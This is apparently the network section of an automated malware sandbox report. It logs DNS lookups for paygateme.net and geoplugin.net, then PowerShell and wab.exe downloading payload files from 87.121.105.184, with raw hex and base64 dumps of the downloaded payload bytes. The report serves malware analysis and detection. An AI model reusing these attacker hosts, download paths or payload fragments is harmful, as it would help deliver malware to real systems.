                                                                                Apr 18, 2024 15:41:52.553679943 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553690910 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553702116 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553713083 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553801060 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553811073 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553821087 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553832054 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553842068 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553864002 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553875923 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553888083 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.553899050 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.575047016 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.575059891 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:52.575071096 CEST228649715146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:57.014597893 CEST228649711146.70.57.34192.168.2.7
                                                                                Apr 18, 2024 15:41:57.017349958 CEST497112286192.168.2.7146.70.57.34
                                                                                Apr 18, 2024 15:41:57.413597107 CEST228649711146.70.57.34192.168.2.7
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 18, 2024 15:40:59.166007042 CEST6292753192.168.2.71.1.1.1
                                                                                Apr 18, 2024 15:40:59.510265112 CEST53629271.1.1.1192.168.2.7
                                                                                Apr 18, 2024 15:41:01.863629103 CEST6523053192.168.2.71.1.1.1
                                                                                Apr 18, 2024 15:41:01.972031116 CEST53652301.1.1.1192.168.2.7
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Apr 18, 2024 15:40:59.166007042 CEST192.168.2.71.1.1.10xc5cfStandard query (0)paygateme.netA (IP address)IN (0x0001)false
                                                                                Apr 18, 2024 15:41:01.863629103 CEST192.168.2.71.1.1.10x47b2Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Apr 18, 2024 15:40:59.510265112 CEST1.1.1.1192.168.2.70xc5cfNo error (0)paygateme.net146.70.57.34A (IP address)IN (0x0001)false
                                                                                Apr 18, 2024 15:41:01.972031116 CEST1.1.1.1192.168.2.70x47b2No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                • 87.121.105.184
                                                                                • geoplugin.net
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.74970087.121.105.184805768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Apr 18, 2024 15:40:08.574493885 CEST179OUTGET /Fodgngerovergangs.prm HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                Host: 87.121.105.184
                                                                                Connection: Keep-Alive
                                                                                Apr 18, 2024 15:40:08.775496960 CEST1289INHTTP/1.1 200 OK
                                                                                Date: Thu, 18 Apr 2024 13:40:08 GMT
                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                Last-Modified: Thu, 18 Apr 2024 09:29:32 GMT
                                                                                ETag: "72654-6165b9bccf700"
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 468564
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Data Raw: 63 51 47 62 63 51 47 62 75 31 2f 65 43 51 44 72 41 6b 53 44 36 77 4c 34 4c 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 6c 66 79 58 6e 75 73 43 57 2b 62 72 41 71 52 44 67 65 6c 65 6e 4c 44 59 63 51 47 62 36 77 4a 43 67 59 48 70 4e 32 44 6e 78 58 45 42 6d 2b 73 43 72 4f 54 72 41 71 4e 71 63 51 47 62 75 71 48 78 4e 72 62 72 41 6a 54 64 36 77 4b 76 43 4f 73 43 68 79 58 72 41 6f 4d 69 4d 63 72 72 41 72 4b 6d 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 4c 78 37 64 48 69 36 77 4a 77 50 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 6b 6d 6d 42 2b 57 46 55 30 77 52 38 79 6e 45 42 6d 33 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 76 69 2f 69 63 4e 78 41 5a 76 72 41 6c 78 55 67 63 50 6a 36 47 51 44 63 51 47 62 36 77 4c 48 73 62 6f 66 4f 75 63 46 36 77 4a 79 4d 33 45 42 6d 34 48 71 7a 64 71 49 7a 6e 45 42 6d 33 45 42 6d 34 48 71 55 6c 39 65 4e 33 45 42 6d 2b 73 43 2b 73 33 72 41 73 7a 63 63 51 47 62 36 77 4a 36 47 58 45 42 6d 34 73 4d 45 48 45 42 6d 33 45 42 6d 34 6b 4d 45 33 45 42 6d 2b 73 43 57 45 39 43 36 77 4b 30 79 65 73 43 51 67 4f 42 2b 71 7a 73 42 41 42 31 31 65 73 43 35 70 68 78 41 5a 75 4a 58 43 51 4d 36 77 4a 50 31 2b 73 43 6c 55 4f 42 37 51 41 44 41 41 42 78 41 5a 74 78 41 5a 75 4c 56 43 51 49 36 77 4a 4d 6c 4f 73 43 4b 4f 32 4c 66 43 51 45 36 77 4a 64 4d 75 73 43 52 54 32 4a 36 2b 73 43 75 6a 46 78 41 5a 75 42 77 35 77 41 41 41 44 72 41 70 4a 45 36 77 4c 42 6c 56 50 72 41 73 63 47 63 51 47 62 61 6b 42 78 41 5a 74 78 41 5a 75 4a 36 2b 73 43 57 42 46 78 41 5a 76 48 67 77 41 42 41 41 41 41 51 4f 41 45 36 77 4a 61 77 4f 73 43 50 6d 65 42 77 77 41 42 41 41 44 72 41 6b 50 62 36 77 4c 7a 6c 56 50 72 41 76 2b 5a 63 51 47 62 69 65 76 72 41 73 50 79 63 51 47 62 69 62 73 45 41 51 41 41 36 77 4b 42 38 75 73 43 76 33 71 42 77 77 51 42 41 41 42 78 41 5a 74 78 41 5a 74 54 36 77 49 45 79 33 45 42 6d 32 72 2f 36 77 4c 2b 4c 4f 73 43 51 76 47 44 77 67 58 72 41 6b 50 61 36 77 4a 74 63 54 48 32 36 77 4b 63 67 58 45 42 6d 7a 48 4a 63 51 47 62 36 77 4b 6a 59 49 73 61 63 51 47 62 63 51 47 62 51 58 45 42 6d 33 45 42 6d 7a 6b 63 43 6e 58 30 36 77 49 4d 31 65 73 43 46 34 70 47 36 77 49 30 6a 6e 45 42 6d 34 42 38 43 76 75 34 64 64 31 78 41 5a 74 78 41 5a 75 4c 52 41 72 38 63 51 47 62 63 51 47 62 4b 66 44 72 41 74 7a 59 63 51 47 62 2f 39 4c 72 41 6f 66 32 63 51 47 62 75 71 7a 73 42 41 44 72 41 6e 64 4f 63 51 47 62 4d 63 42 78 41 5a 74 78 41 5a 75 4c 66 43 51 4d 63 51 47 62 36 77 49 75 67 6f 45 30 42 39 79 39 67 66 39 78 41 5a 76 72 41 69 51 38 67 38 41 45 63 51 47 62 36 77 4b 77 42 7a 6e 51 64 65 54 72 41 74 50 69 36 77 49 71 51 6f 6e 37 63 51 47 62 63 51 47 62 2f 39 66 72 41 6c 67 4f 63 51 47 62 35 46 72 6e 77 6d 66 42 43 42 6f 62 4f 4f 77 41 49 30 49 38 52 69 54 64 41 45 71 78 51 6e 34 41 43 65 4a 70 57 46 30 51 37 41 41 6a 51 69 4e 35 31 45 6f 41 55 72 46 43 66 67 41 61 34 59 6b 76 6b 45 49 4d 6b 69 4e 43 66 6f 6f 72 4f 46 69 71 57 45 4d 49 47 6d 57 58 33 6f 6b 47 4f 56 68 2b 4c 54 35 4c 2f 6d 6f 35 51 70 6c 5a 66 77 41 4f 63 6d 48 58 79 46 31 38 6b 45 67 43 47 55 61 37 30 62 32 4a 55 6c 44 73 41 49 76 52 76 54 72 34 38 5a 70 33 4f 62 45 38
                                                                                Data Ascii: cQGbcQGbu1/eCQDrAkSD6wL4LwNcJARxAZtxAZu5lfyXnusCW+brAqRDgelenLDYcQGb6wJCgYHpN2DnxXEBm+sCrOTrAqNqcQGbuqHxNrbrAjTd6wKvCOsChyXrAoMiMcrrArKmcQGbiRQLcQGb6wLx7dHi6wJwP3EBm4PBBHEBm+sCkmmB+WFU0wR8ynEBm3EBm4tEJARxAZvrAvi/icNxAZvrAlxUgcPj6GQDcQGb6wLHsbofOucF6wJyM3EBm4HqzdqIznEBm3EBm4HqUl9eN3EBm+sC+s3rAszccQGb6wJ6GXEBm4sMEHEBm3EBm4kME3EBm+sCWE9C6wK0yesCQgOB+qzsBAB11esC5phxAZuJXCQM6wJP1+sClUOB7QADAABxAZtxAZuLVCQI6wJMlOsCKO2LfCQE6wJdMusCRT2J6+sCujFxAZuBw5wAAADrApJE6wLBlVPrAscGcQGbakBxAZtxAZuJ6+sCWBFxAZvHgwABAAAAQOAE6wJawOsCPmeBwwABAADrAkPb6wLzlVPrAv+ZcQGbievrAsPycQGbibsEAQAA6wKB8usCv3qBwwQBAABxAZtxAZtT6wIEy3EBm2r/6wL+LOsCQvGDwgXrAkPa6wJtcTH26wKcgXEBmzHJcQGb6wKjYIsacQGbcQGbQXEBm3EBmzkcCnX06wIM1esCF4pG6wI0jnEBm4B8Cvu4dd1xAZtxAZuLRAr8cQGbcQGbKfDrAtzYcQGb/9LrAof2cQGbuqzsBADrAndOcQGbMcBxAZtxAZuLfCQMcQGb6wIugoE0B9y9gf9xAZvrAiQ8g8AEcQGb6wKwBznQdeTrAtPi6wIqQon7cQGbcQGb/9frAlgOcQGb5FrnwmfBCBobOOwAI0I8RiTdAEqxQn4ACeJpWF0Q7AAjQiN51EoAUrFCfgAa4YkvkEIMkiNCfoorOFiqWEMIGmWX3okGOVh+LT5L/mo5QplZfwAOcmHXyF18kEgCGUa70b2JUlDsAIvRvTr48Zp3ObE8
                                                                                Apr 18, 2024 15:40:08.775517941 CEST1289INData Raw: 39 66 4c 63 51 31 41 58 4b 54 7a 31 38 74 7a 77 2b 72 5a 66 46 43 30 6e 4e 64 38 41 50 73 6a 55 34 76 6c 64 56 4a 47 57 76 37 76 6e 78 68 38 30 44 4d 33 65 76 59 46 47 36 33 6f 33 62 46 31 4d 69 75 6b 47 63 77 41 4f 44 43 78 58 69 6c 68 49 41 41
                                                                                Data Ascii: 9fLcQ1AXKTz18tzw+rZfFC0nNd8APsjU4vldVJGWv7vnxh80DM3evYFG63o3bF1MiukGcwAODCxXilhIAA5I/DvX5GS4cu6/gf9XMLP93L30ZbpKQ1QgOX3HBtsELFhY58YNNASH3b2Bxyg0HLPdvYF7DYV8rLpKRgHqVTAe2L15dpn5BD01DSb73DIEm929gcYF2wQntKc7dDxVfVHYvQQtVeCdewYFlL8ks+fGBYgDCyPuhCP
                                                                                Apr 18, 2024 15:40:08.775530100 CEST1289INData Raw: 5a 63 58 78 54 65 44 2f 78 79 49 53 4e 41 42 39 62 4f 71 72 4c 58 6c 33 67 49 4d 39 73 56 32 48 53 56 51 69 42 36 41 72 2f 65 45 35 30 51 4c 32 73 4e 69 71 79 6e 73 66 39 62 53 6c 74 4b 57 68 4f 4a 38 4c 35 66 35 43 44 35 45 62 50 59 39 34 5a 4f
                                                                                Data Ascii: ZcXxTeD/xyISNAB9bOqrLXl3gIM9sV2HSVQiB6Ar/eE50QL2sNiqynsf9bSltKWhOJ8L5f5CD5EbPY94ZOJp4Z4dfmGhUCm2THGvzOIXToj3qx1/GPur1c4b/7cvddBtNelOV1L+MQz+AA5MxK1g40hCB7VjBx7FM2Tv0MxlbTFIiXKfXADvm2C2rZ9mU9L4U9ieitO/jg6X0AyUwkMpaiPH9JYd9h6FuNp3HO5gXBZOYH/3DYM
                                                                                Apr 18, 2024 15:40:08.775546074 CEST1289INData Raw: 74 64 65 2f 4e 4e 4f 35 45 41 4f 52 6f 78 38 74 47 4d 49 51 67 66 31 59 30 63 6d 56 6c 31 38 39 36 6e 70 6c 2b 66 77 50 52 2f 2b 58 30 58 45 38 4c 58 58 35 4b 35 78 37 76 52 75 64 38 44 68 62 73 76 67 32 32 48 4e 66 31 57 35 53 75 70 55 4c 35 47
                                                                                Data Ascii: tde/NNO5EAORox8tGMIQgf1Y0cmVl1896npl+fwPR/+X0XE8LXX5K5x7vRud8Dhbsvg22HNf1W5SupUL5GatqCYg12CFGU+6e3sAQuhNt2PJ1J33ZB9YP/3LKAqty9gf/cvYH/3L2B/9y9gf/cvYH/3L2B/9xKphUD20O5HGbg1vJ15Hq46INWZ6CM2N48anoIbIjw3XlW/9y9gf/cvYH/3L2B/9y9gf/cvYH/3L2BCjhndaxcD
                                                                                Apr 18, 2024 15:40:08.775593996 CEST1289INData Raw: 61 6e 70 74 79 71 6a 59 51 32 4b 6a 54 6f 70 6f 41 30 2f 6a 79 59 6b 4a 38 37 7a 73 33 34 55 69 42 66 69 36 4e 7a 59 68 2b 50 45 50 6c 49 42 32 58 66 68 37 50 44 79 4b 61 4e 4c 73 65 42 30 32 51 68 34 44 55 62 45 52 68 57 33 64 4d 37 36 36 69 37
                                                                                Data Ascii: anptyqjYQ2KjTopoA0/jyYkJ87zs34UiBfi6NzYh+PEPlIB2Xfh7PDyKaNLseB02Qh4DUbERhW3dM766i7hxSwnr/7UZtskmvrSAVyTjiBClUQ/nDN1Tn6ZM/bEytZlOvvH48c122e09+Lj2Mc4g8aw/FtLl2xlTX6hL0Stdz7NOM7olGS4cSROGa8eSA2b9kDY3m6JD3ILKneeN+Mc7n6SyfXPJ+6JkKHDo/ANP4HecCNjyF27
                                                                                Apr 18, 2024 15:40:08.775696039 CEST1289INData Raw: 6a 68 7a 47 42 38 32 5a 38 6a 38 54 39 4a 33 47 64 76 64 68 63 4a 4a 72 70 36 63 61 75 64 57 61 6d 31 61 2b 34 75 6a 6c 4a 39 78 43 66 43 75 78 49 33 71 44 6f 54 4e 35 6d 6c 33 41 38 5a 55 48 76 59 48 77 55 37 6c 4e 2b 39 7a 6d 75 43 79 43 36 7a
                                                                                Data Ascii: jhzGB82Z8j8T9J3GdvdhcJJrp6caudWam1a+4ujlJ9xCfCuxI3qDoTN5ml3A8ZUHvYHwU7lN+9zmuCyC6z88LApNfiqKrXC9PHcLAYUsr0A0YfbsIOd6HsmJGhRhtE74HhiMNvdUDX4BeCB8io5Tsrd20wxRQO3cDsmX7dC72IJW8UB7Sb+ZRlbiSak5Qae6SkbOBePpSZtqHJeauqcbXZGlGPHGq37omTVw3a4A0/hi11R2cSl
                                                                                Apr 18, 2024 15:40:08.775712013 CEST1289INData Raw: 63 7a 5a 39 62 4a 64 66 35 54 44 33 50 2f 52 59 31 56 64 67 4f 39 42 32 77 51 48 70 70 55 38 68 54 64 53 6a 39 70 6d 45 53 64 4f 45 50 74 59 41 31 38 73 62 63 44 52 4e 6a 67 52 52 58 6e 58 30 43 69 6e 71 49 76 61 31 54 43 62 2b 7a 79 78 55 57 66
                                                                                Data Ascii: czZ9bJdf5TD3P/RY1VdgO9B2wQHppU8hTdSj9pmESdOEPtYA18sbcDRNjgRRXnX0CinqIva1TCb+zyxUWfOQvtZZ9nHH+fSRKUCg21dTpfpFAwADAVFX6JdVphO0J4ADDighqRVti3gPYts6ydkFDJehmxqoXOalR8zhLVCgnL3N4z4FUnIBRepJcvnnVDmHrNj5tOxL6qk07yRxdy9gf/cvYH/3L2B/9y9gf/cvYH/3L2B/y2V
                                                                                Apr 18, 2024 15:40:08.775727034 CEST1289INData Raw: 6b 7a 4c 45 57 4f 6f 33 34 5a 4a 77 70 67 65 55 78 30 4a 6b 6a 59 69 79 34 69 45 46 78 38 53 57 67 6d 54 61 4c 48 46 53 72 52 44 35 44 38 48 44 75 49 78 64 67 67 6d 75 70 58 56 37 55 6c 79 64 6f 6d 6b 2b 30 4b 65 6e 4f 38 67 66 2f 54 76 48 62 55
                                                                                Data Ascii: kzLEWOo34ZJwpgeUx0JkjYiy4iEFx8SWgmTaLHFSrRD5D8HDuIxdggmupXV7Ulydomk+0KenO8gf/TvHbU3L2B/9y9gf/cvYH/3L2B/9y9gf/cvYH/MQ5Gs+mLwrqIVTv5wkBkhYsnxnkEJ63nPDQ82N69gUD3PSrGjgdmlSXpAA2lmp2kXVcfszmy1mNVWojoQYVah8Qa+ZmUyDtSe04E5Hue/9Xu4/vD0SlYOqJYgwS0deatw
                                                                                Apr 18, 2024 15:40:08.775738001 CEST1289INData Raw: 6d 78 79 68 4c 73 6f 68 66 2b 48 48 4c 6e 64 54 41 6b 48 79 32 69 78 34 4a 50 79 39 6b 44 54 66 36 67 61 32 42 47 4f 6d 74 57 53 4d 4f 37 6e 76 6d 63 76 41 62 69 34 48 2f 33 4c 32 42 2f 39 79 39 67 66 2f 63 76 59 48 2f 33 4c 32 42 2f 39 79 39 67
                                                                                Data Ascii: mxyhLsohf+HHLndTAkHy2ix4JPy9kDTf6ga2BGOmtWSMO7nvmcvAbi4H/3L2B/9y9gf/cvYH/3L2B/9y9gf/cvXBB2LQOmThNtD1F00V2WYmD/9wFLp6hsoS1FFCR0ivG0cQoDfdm3L2B/9y9gf/cvYH/3L2B/9y9gf/cvYH/Nj3Mn6SdoKZ2mQKLrb/+atQKsaiQDrT9cqdkrmWlhImQPHDXngVzfi2HyDFiNLBwzPV2tfAxYS
                                                                                Apr 18, 2024 15:40:08.775749922 CEST1289INData Raw: 33 61 4c 4e 2f 39 79 39 67 66 2f 63 76 59 48 2f 33 4c 32 42 2f 39 79 39 67 66 2f 63 76 59 48 2f 33 4c 32 42 43 4b 35 56 49 37 57 49 58 34 4d 39 5a 36 4b 71 6c 54 55 62 65 59 35 50 32 74 42 47 53 61 4c 62 72 6c 31 38 71 68 79 5a 47 41 41 57 48 4c
                                                                                Data Ascii: 3aLN/9y9gf/cvYH/3L2B/9y9gf/cvYH/3L2BCK5VI7WIX4M9Z6KqlTUbeY5P2tBGSaLbrl18qhyZGAAWHLwhCY4hCB3dtxyZWXv0+hfYIByz3RNqRdkwvH/kolKR1NOYVkOA9bhdeU/YFwUShtsEJIU8tdtcW5rsXYmloS4bMn7wmdOt1dLRR3qC7M7ZYaKTyoiR/3ZzrJuqzwh2xAHuGLh6g0SURib1KjnX2PBmskAgyOdqWsS
                                                                                Apr 18, 2024 15:40:08.975203037 CEST1289INData Raw: 5a 61 58 57 31 59 44 76 6c 32 6f 76 6a 62 75 4f 72 51 5a 71 6d 42 2b 4c 78 63 45 68 48 49 38 63 75 44 65 30 63 35 32 78 79 42 6e 6b 6a 37 66 34 47 34 4b 2b 6f 79 68 6a 73 76 6c 39 7a 38 75 67 2f 65 36 73 78 59 52 68 57 41 6a 43 6a 37 52 42 53 31
                                                                                Data Ascii: ZaXW1YDvl2ovjbuOrQZqmB+LxcEhHI8cuDe0c52xyBnkj7f4G4K+oyhjsvl9z8ug/e6sxYRhWAjCj7RBS18mueOzo+ZKeW/w0OHNszjZvdoU6Bx44Q4WmnkqAYROlDTuDvuJJBn5yiKUy4n4PskeoNeNGgC+9w0xNsQ9kja2HJIX7ae/SuZsMuXaBdDM3EwCWa4peRXIIXeRPlRb/205gx0QTyF2wA+yNG6skbM3L2B/9y9gf/c


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.74971087.121.105.184801848C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Apr 18, 2024 15:40:57.367261887 CEST180OUTGET /JTcKQkcYvvHPBH210.bin HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                Host: 87.121.105.184
                                                                                Cache-Control: no-cache
                                                                                Apr 18, 2024 15:40:57.565227985 CEST1289INHTTP/1.1 200 OK
                                                                                Date: Thu, 18 Apr 2024 13:40:57 GMT
                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                Last-Modified: Thu, 18 Apr 2024 09:25:42 GMT
                                                                                ETag: "78c40-6165b8e177180"
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 494656
                                                                                Content-Type: application/octet-stream
                                                                                Data Raw: 7e 69 9d 34 e9 97 6c 38 10 e3 b9 92 1f 18 41 9e 76 a4 26 28 17 cc 87 62 be 6e b5 73 76 c0 f8 f9 bb 42 48 1d c4 dc 0c c2 6a e3 07 1f 9a fb c7 bd 8e f1 09 d0 17 a4 fe 52 f2 c4 46 56 cb 5b e8 a6 01 ef 12 56 b0 5a 74 f6 13 48 66 42 cc ab d4 31 27 84 23 c8 f3 93 5d 75 8b 46 54 1f a3 e1 59 19 2f 0b f9 8b 03 95 25 f9 84 04 b0 8b bd c7 19 b4 00 71 54 fe 33 92 89 ed 63 b3 41 07 61 bd dc 47 e3 4c 35 85 2b 1b 28 d8 11 f9 6f 8b 01 86 51 9d 50 e4 4e 19 d8 ba 8b 08 8d 7e 7c 16 00 47 5d ed 57 ee 98 58 e3 43 93 da 9c a7 be 84 32 c6 c4 b1 9a 66 e2 be a8 75 05 bc e2 0d 79 7a d4 f0 21 80 aa 1f 92 6e f6 d3 77 13 17 98 85 0c a1 9b 63 20 fe c7 fb 1a e4 16 8c f9 3d 1d 2f e5 31 4f 69 c3 76 ff 62 45 fb a5 ca e3 05 ba 9d 21 b2 c5 01 c4 66 7f 98 8d 78 06 a7 2f 17 c8 f8 76 dd a2 4d 36 b0 b3 e5 b4 b9 51 79 43 f6 1b 6f d3 62 75 31 b0 48 ec 72 1b 5f 19 71 59 f6 58 b2 12 93 56 98 45 06 3b 79 28 88 2a 90 1a fc df 87 08 b9 99 0b 94 aa 6b ad c7 72 78 60 13 a6 7a ae 8a d9 6d c6 3b 85 63 ca 6e 3b f2 a3 c3 a0 25 e1 fc cd ba fe 6a d4 8c 28 42 f9 4a 44 51 11 62 29 5e 40 e5 cf 1c 53 4d f1 d2 65 81 97 e8 ae c8 e7 37 c0 18 4c 89 b4 6e 00 90 1d 85 cf 4b 6b e9 5b 72 b9 d0 39 a4 c8 09 ca 5f d7 20 1b 7e 73 ef 80 da d0 e9 7a d8 4d e3 10 aa f3 2e dd 51 91 4c eb a0 7b 9a 74 0b 30 50 67 db 77 ab 53 d4 67 f9 07 3e 73 1e 36 b2 74 fe 35 a8 7c 04 f8 45 39 27 43 c4 4c e3 2d f9 d1 70 4d 31 3b 7e 5e cc 7e 79 65 ff 73 8d 10 2b 3e 55 39 e4 a5 4d 6f 1f d5 e5 63 bc 3f 52 a7 11 85 ac cf 66 82 62 b4 3f 36 83 ca 19 77 21 c0 41 bd 6e 58 fc 55 05 54 c5 3e 44 7b 87 12 b0 a8 d6 08 dc cc b6 66 ad 73 24 c7 54 9d f3 52 1b 48 4d c6 34 89 53 ec 66 7b 33 34 90 cd cd 4c 1a 93 8d 90 bb a0 b5 59 92 58 e6 cc d4 43 cf ac f4 6d 9c 4f c0 ec f4 84 16 d3 0d ee cc 30 16 45 27 76 cd 62 57 30 cf d8 37 85 17 85 19 09 d5 c7 bb 19 36 f5 5e 49 90 11 2e ec 37 8f 40 ef 5a 00 b6 37 71 fe 88 37 24 34 01 78 99 a5 40 f4 c9 c6 45 4e f8 77 aa 36 60 46 25 1c be fe da 41 49 45 38 eb 17 b3 86 77 03 24 1c e7 08 42 0b 5f a7 93 6d cc 64 ed 15 db 6c 41 08 f8 83 35 c5 07 fd 20 97 1b 76 a9 de ea 08 19 94 85 b1 bd c2 34 28 22 53 f1 68 8f 9e 23 31 5e 6f 7b 9b 9d bb d4 9c f7 6f 9e 28 9c 94 b9 dd 1b c8 b2 42 f3 90 87 fa 73 69 fb 66 e3 8d 1e 68 29 e4 d2 03 2f cf 7d 7d 96 e4 d5 78 16 02 53 62 d4 1f a4 a6 1c 3e ec f4 7c 22 8c a3 5c a9 74 cd 80 42 b7 d6 ad d1 91 ea c6 ff 16 bd 4a bc 20 fd 82 78 92 89 6e a4 0b fb 4c 0d 5a a3 90 67 89 60 b5 a9 5e 28 c9 b6 02 a0 4d 60 b4 7b 35 2e 79 9e 36 1f 91 67 ab 2e 6b 9d c4 af 93 6d 9a 2e 22 b6 fa 2a a1 7d 01 3c b2 4b d5 3b 0d 89 62 c9 1b be 8e bd 20 a9 ba be b9 52 df 63 ba 13 1a 4a cb 57 80 0a 9d ab 93 7b 78 c2 d5 a2 6d 16 43 bc a5 00 24 9b ed be 10 61 26 b2 09 fb f1 45 18 e8 e7 1d 8a 49 c4 3d cf 23 8e 3e 27 26 11 39 9b 80 3e be a3 71 c1 7b 39 13 53 b5 2f 22 c1 27 97 39 b9 95 31 5c 1f 84 cc 68 29 65 36 91 5e 61 7a a0 25 56 45 f5 27 58 ea 1b ec 1d 9c 83 d0 74 5d 17 d4 f2 e5 e0 28 0c f2 7e c7 81 81 5c 32 e9 02 8f d8 51 7f d2 64 ac 3b 23 0e b2 a7 09 c5 73 40 37 7f e9 7a d2 0e 37 c1 f1 15 0f 93 63 1b fc 8c 37 ab 70 8b 2e a9 dd 00 09 20 0a 63 73 07 66 12 b6 f4 f7 f5 00 17 d3 16 8b 45 b7 93 c9 43 5d f7 21 17 c9 4e 57 89 f0 7a 5f 93 34 ed 76 ee e1
                                                                                Data Ascii: ~i4l8Av&(bnsvBHjRFV[VZtHfB1'#]uFTY/%qT3cAaGL5+(oQPN~|G]WXC2fuyz!nwc =/1OivbE!fx/vM6QyCobu1Hr_qYXVE;y(*krx`zm;cn;%j(BJDQb)^@SMe7LnKk[r9_ ~szM.QL{t0PgwSg>s6t5|E9'CL-pM1;~^~yes+>U9Moc?Rfb?6w!AnXUT>D{fs$TRHM4Sf{34LYXCmO0E'vbW076^I.7@Z7q7$4x@ENw6`F%AIE8w$B_mdlA5 v4("Sh#1^o{o(Bsifh)/}}xSb>|"\tBJ xnLZg`^(M`{5.y6g.km."*}<K;b RcJW{xmC$a&EI=#>'&9>q{9S/"'91\h)e6^az%VE'Xt](~\2Qd;#s@7z7c7p. csfEC]!NWz_4v
                                                                                Apr 18, 2024 15:40:57.565291882 CEST1289INData Raw: 91 1d 31 17 3d 48 87 0e 43 9f b4 bb 57 6c 43 93 00 49 d6 85 49 39 06 91 b7 67 d4 d0 92 cc 03 7b 18 14 ad 7d 5d 9c 50 84 f6 d2 13 f8 bf 59 9c ed 2c 33 2e 66 36 19 f2 27 84 ba 33 25 30 bb b9 98 6d f5 79 93 a5 d5 5e 82 f5 73 73 0c cb 46 47 30 fc e2
                                                                                Data Ascii: 1=HCWlCII9g{}]PY,3.f6'3%0my^ssFG0c@.ZV/$\W1Tw^Kq>T/L0h!Wj]CwgV8az]Z8fS2kf({it$H&ZsXYQQX!E(N7k"|0%HY<bQ.Z
                                                                                Apr 18, 2024 15:40:57.565336943 CEST1289INData Raw: 88 cd a4 8a a1 8e 90 72 66 0c fd b6 1f e6 24 0b 7e cc ac 9c 2e 1d 0a c0 04 8e b6 15 d3 54 2d a4 7d 97 00 27 9e a3 7e 20 55 ee 6f 5f d2 96 b5 68 e4 b7 f5 a8 19 6f 36 44 2d 11 54 2a 04 61 bd 43 ef 03 c3 0f e7 50 b9 88 df 81 29 02 78 91 e0 b3 d5 a8
                                                                                Data Ascii: rf$~.T-}'~ Uo_ho6D-T*aCP)xZd|yr2l"3'('X{,(+ <C,&VUz+"5dLo/D`)Vx?>>8~DxYG{)-H.\3M=m:?
                                                                                Apr 18, 2024 15:40:57.565397024 CEST1289INData Raw: c5 8e e6 a2 9d 3e 61 ce 0a d1 e8 7f 38 4f 88 c6 e4 82 06 50 b0 ef 78 e1 1f d8 d8 50 b3 80 4a 7c f4 5a 8b e3 53 dc 23 42 b8 59 00 5a d8 84 cb 1f 0e 6c a2 f6 f6 12 3f 58 a3 1e 2c 16 a4 c4 11 83 2d 95 25 a8 0f cb 58 10 93 c7 19 37 ec 69 d9 ba 17 ba
                                                                                Data Ascii: >a8OPxPJ|ZS#BYZl?X,-%X7i!3[i&fg!*)~72a3&81E5wp'>z_*vyi)8'^j1\*W5o|w,8T{%qH!:[%y_5dK*!#
                                                                                Apr 18, 2024 15:40:57.565434933 CEST1289INData Raw: 57 f7 5d b8 f1 b6 50 87 4b 92 09 8d 27 9a ce ad b8 1d a0 1b 12 b2 a6 31 c8 4d bb 5f 2f 96 92 45 74 42 86 a1 b9 24 27 1c 19 af 81 3e 31 7a a9 98 65 97 6d f3 54 a1 0d cb 55 5e 32 75 24 cd ea 28 9a 62 ab c8 67 e2 0e 91 d1 a9 36 a7 f4 ce a1 7c e6 4c
                                                                                Data Ascii: W]PK'1M_/EtB$'>1zemTU^2u$(bg6|LJNRtd{Z@7%5Q'?dUF)@c/ R2sQ3AMK|'SO1Kea_cfuDF$VwjioTj 8SJ*"WS*V
                                                                                Apr 18, 2024 15:40:57.565476894 CEST1289INData Raw: f6 88 07 3b 0f f1 cb 7c 9c 9d 81 3f aa de 05 ab a5 ba be e0 02 8a 8b b9 e1 e5 b5 48 93 cc 81 9e 62 5d 3b 28 3d a1 86 79 fe b1 41 5a ff af 53 05 c1 13 61 26 ef 52 70 3f ad 42 eb e7 1d 75 3d e0 31 44 ed 49 3e 28 26 11 39 73 97 3b be a3 2f 03 73 39
